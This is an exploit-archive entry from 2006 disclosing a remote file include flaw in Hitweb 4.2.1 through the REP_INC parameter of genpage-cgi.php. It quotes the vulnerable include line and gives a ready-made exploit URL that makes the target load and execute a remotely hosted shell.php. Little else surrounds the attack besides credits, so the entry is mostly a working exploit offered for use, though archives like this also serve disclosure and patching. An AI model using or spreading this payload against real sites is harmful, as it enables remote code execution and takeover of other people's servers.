Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability
# Published : 2006-08-08
# Author : Drago84
# Previous Title : phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability
# Next Title : CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) SQL Injection

Hitweb 4.2 Remote Include File

CreW: ToxiC

Bug Found By Drago84

Sorce Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz

Problem is:
include "$REP_INC/lib_database.php";

Page:
genpage-cgi.php

Path:
Declare $REP_INC

Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?

Greatz:Str0ke

# www.Syue.com [2006-08-08]